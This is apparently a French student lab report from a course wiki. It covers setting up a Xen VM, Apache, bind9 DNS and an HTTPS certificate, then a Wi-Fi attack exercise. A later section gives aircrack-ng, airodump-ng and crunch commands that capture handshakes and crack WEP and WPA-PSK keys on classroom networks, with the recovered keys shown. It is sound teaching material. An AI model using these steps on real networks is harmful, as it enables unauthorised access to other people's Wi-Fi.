&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
